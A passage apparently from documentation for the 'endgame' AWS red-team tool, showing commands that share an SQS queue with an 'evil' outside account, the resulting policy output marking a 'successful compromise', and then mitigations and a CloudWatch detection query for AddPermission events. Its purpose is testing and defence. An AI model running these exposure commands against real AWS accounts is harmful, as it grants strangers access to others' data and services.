- To expose the resource using
endgame
, run the following from the victim account:
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service iam --name test-resource-exposure
- To verify that the SQS queue has been shared with a rogue user, run the following from the victim account:
export QUEUE_URL=(`aws sqs get-queue-url --queue-name test-resource-exposure | jq -r '.QueueUrl'`)
aws sqs get-queue-attributes --queue-url $QUEUE_URL --attribute-names Policy
- Observe that the contents match the example shown below.
The policy below allows the Evil Principal's account ID (999988887777
access to sqs:*
to the victim resource (arn:aws:sqs:us-east-1:111122223333:test-resource-exposure
), indicating a successful compromise.
{
"Attributes": {
"Policy": "{\"Version\":\"2008-10-17\",\"Id\":\"arn:aws:sqs:us-east-1:111122223333:test-resource-exposure/SQSDefaultPolicy\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"SQS:*\",\"Resource\":\"arn:aws:sqs:us-east-1:111122223333:test-resource-exposure\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":\"SQS:*\",\"Resource\":\"arn:aws:sqs:us-east-1:111122223333:test-resource-exposure\"}]}"
}
}
TODO
- Trusted Accounts Only: Ensure that SQS Queues are only shared with trusted accounts, and that the trusted accounts truly need access to the SQS Queue.
- Ensure access is necessary: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
- AWS Access Analyzer: Leverage AWS Access Analyzer to report on external access to SQS Queues. See the AWS Access Analyzer documentation for more details.
- Restrict access to IAM permissions that could lead to exposure of your SQS Queues: Tightly control access to the following IAM actions: - sqs:AddPermission: Adds a permission to a queue for a specific principal. - sqs:RemovePermission: Revokes any permissions in the queue policy that matches the specified Label parameter. - sqs:GetQueueAttributes: Gets attributes for the specified queue. This includes retrieving the list of principals who are authorized to access the queue. - sqs:GetQueueUrl: Returns the URL of an existing queue. - sqs:ListQueues: Returns a list of your queues.
Also, consider using Cloudsplaining to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report here
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='sqs.amazonaws.com' AND (eventName='AddPermission' or eventName='RemovePermission')
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.